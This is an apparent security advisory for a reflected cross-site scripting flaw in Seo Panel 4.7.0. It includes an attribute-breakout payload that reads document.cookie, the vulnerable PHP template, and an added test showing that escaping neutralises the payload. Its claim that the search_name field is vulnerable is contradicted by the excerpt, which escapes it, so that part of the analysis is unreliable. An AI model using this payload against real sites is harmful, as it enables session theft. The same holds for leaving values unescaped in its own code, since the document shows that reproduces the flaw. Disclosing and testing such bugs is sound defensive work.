Seo Panel 4.7.0 Cross Site Scripting
2024-4-6 02:5:14

# Exploit Title: Seo Panel 4.7.0 Reflected XSS
# Exploit Author: Arzu DEMİREZ
# Date: 05.03-2024
# Vendor Homepage:
# Software Link:
# Version: Seo Panel 4.7.0

A cross-site scripting (XSS) issue in the SEO admin login panel version 4.7.0 allows remote attackers to inject JavaScript.

Payload used:
x" onmouseover=alert(document.cookie) x="

Review Of Analysis:
In the archive.ctp.php file, search_form and its search_name input are loaded by the script call at line 71:
<a href="javascript:void(0);" onclick="scriptDoLoadPost('archive.php', 'search_form', 'content')" class="actionbut"><?php echo $spText['button']['Search']?></a>
Because of that, an attacker who sends the code
x" onmouseover=alert(document.cookie) x="
can exploit the victim.

<form id='search_form'>
<table width="100%" class="search">
  <tr>
    <th><?php echo $spText['common']['Name']?>: </th>
    <td>
      <?php /* search_name is entity-encoded with ENT_QUOTES before it is echoed */ ?>
      <input type="text" name="search_name" value="<?php echo htmlentities($searchInfo['search_name'], ENT_QUOTES)?>" onblur="<?php echo $submitLink?>">
    </td>
    <th><?php echo $spText['common']['Period']?>:</th>
    <td colspan="2">
      <?php /* $fromTime and $toTime are echoed into the value attributes with no escaping call here */ ?>
      <input type="text" value="<?php echo $fromTime?>" name="from_time" id="from_time_summary"/>
      <input type="text" value="<?php echo $toTime?>" name="to_time" id="to_time_summary"/>
      <script>
      $( function() {
        $( "#from_time_summary, #to_time_summary").datepicker({dateFormat: "yy-mm-dd"});
      } );
      </script>
    </td>
  </tr>
  <tr>
    <th><?php echo $spText['common']['Website']?>: </th>
    <td>
      <select name="website_id" id="website_id" onchange="scriptDoLoadPost('archive.php', 'search_form', 'content')" style="width: 180px;">
        <option value="">-- <?php echo $spText['common']['Select']?> --</option>
        <?php foreach($siteList as $websiteInfo){?>
          <?php if($websiteInfo['id'] == $websiteId){?>
            <option value="<?php echo $websiteInfo['id']?>" selected><?php echo $websiteInfo['name']?></option>
          <?php }else{?>
            <option value="<?php echo $websiteInfo['id']?>"><?php echo $websiteInfo['name']?></option>
          <?php }?>
        <?php }?>
      </select>
    </td>
    <th><?php echo $spText['label']['Report Type']?>: </th>
    <td>
      <select name="report_type" id="report_type" onchange="scriptDoLoadPost('archive.php', 'search_form', 'content')" style="width: 210px;">
        <option value="">-- <?php echo $spText['common']['Select']?> --</option>
        <?php foreach($reportTypes as $type => $info){?>
          <?php if($type == $searchInfo['report_type']){?>
            <option value="<?php echo $type?>" selected><?php echo $info?></option>
          <?php }else{?>
            <option value="<?php echo $type?>"><?php echo $info?></option>
          <?php }?>
        <?php }?>
      </select>
    </td>
    <td>
      <a href="javascript:void(0);" onclick="scriptDoLoadPost('archive.php', 'search_form', 'content')" class="actionbut"><?php echo $spText['button']['Search']?></a>
    </td>
  </tr>
</table>
</form>

Best Regards,
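
The template excerpt echoes some values into double-quoted attributes through htmlentities(..., ENT_QUOTES) and others with no escaping call. The following added example (not Seo Panel code and not the advisory author's) shows what that difference does to the payload quoted above. render_input() and attribute_names() are hypothetical helpers, and from_time is used only because the excerpt echoes $fromTime as-is.

```php
<?php
// Added example, not Seo Panel code. render_input() and attribute_names()
// are hypothetical helpers; "from_time" is a field name from the excerpt.

// Build a text input the way the template does, optionally escaping the value.
function render_input(string $name, string $value, bool $escape): string
{
    if ($escape) {
        // ENT_QUOTES encodes both " and ', so the value cannot close the attribute.
        $value = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
    return '<input type="text" value="' . $value . '" name="' . $name . '"/>';
}

// Parse the markup with PHP's DOM (libxml2) HTML parser and list the
// attribute names the <input> element ends up with.
function attribute_names(string $html): array
{
    libxml_use_internal_errors(true);   // collect parser warnings instead of emitting them
    $doc = new DOMDocument();
    $doc->loadHTML($html, LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD);
    libxml_clear_errors();
    $names = [];
    $input = $doc->getElementsByTagName('input')->item(0);
    foreach ($input->attributes as $attr) {
        $names[] = $attr->nodeName;
    }
    return $names;
}

// The payload quoted in the advisory.
$payload = 'x" onmouseover=alert(document.cookie) x="';

foreach ([false, true] as $escape) {
    $html  = render_input('from_time', $payload, $escape);
    $names = attribute_names($html);
    // Any on* attribute means the value closed its quotes and became markup.
    $handlers = array_filter($names, fn($n) => stripos($n, 'on') === 0);
    printf("%s\n  %s\n  attributes: %s\n  event handlers injected: %s\n",
        $escape ? 'escaped' : 'raw echo',
        $html,
        implode(', ', $names),
        $handlers ? implode(', ', $handlers) : 'none');
}
```

The same check can be used as a regression test for each field submitted by search_form once its echo is wrapped in an escaping call.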

